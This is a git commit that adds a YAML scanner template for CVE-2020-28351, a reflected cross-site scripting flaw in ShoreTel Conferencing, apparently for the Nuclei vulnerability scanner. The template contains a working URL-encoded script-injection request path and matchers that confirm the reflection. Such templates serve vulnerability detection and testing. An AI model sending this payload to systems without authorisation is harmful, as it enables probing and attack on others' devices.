Merge pull request #2677 from pikpikcu/patch-278

Create CVE-2020-28351.yaml
patch-1
Prince Chaddha 2021-09-15 17:33:36 +05:30 committed by GitHub
commit f5c71d54e2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2020-28351
info:
name: ShoreTel 19.46.1802.0 XSS
author: pikpikcu
severity: medium
description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page
reference:
- https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-28351
tags: cves,cve2020,shoretel,xss
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
words:
- 'Content-Type: text/html'
part: header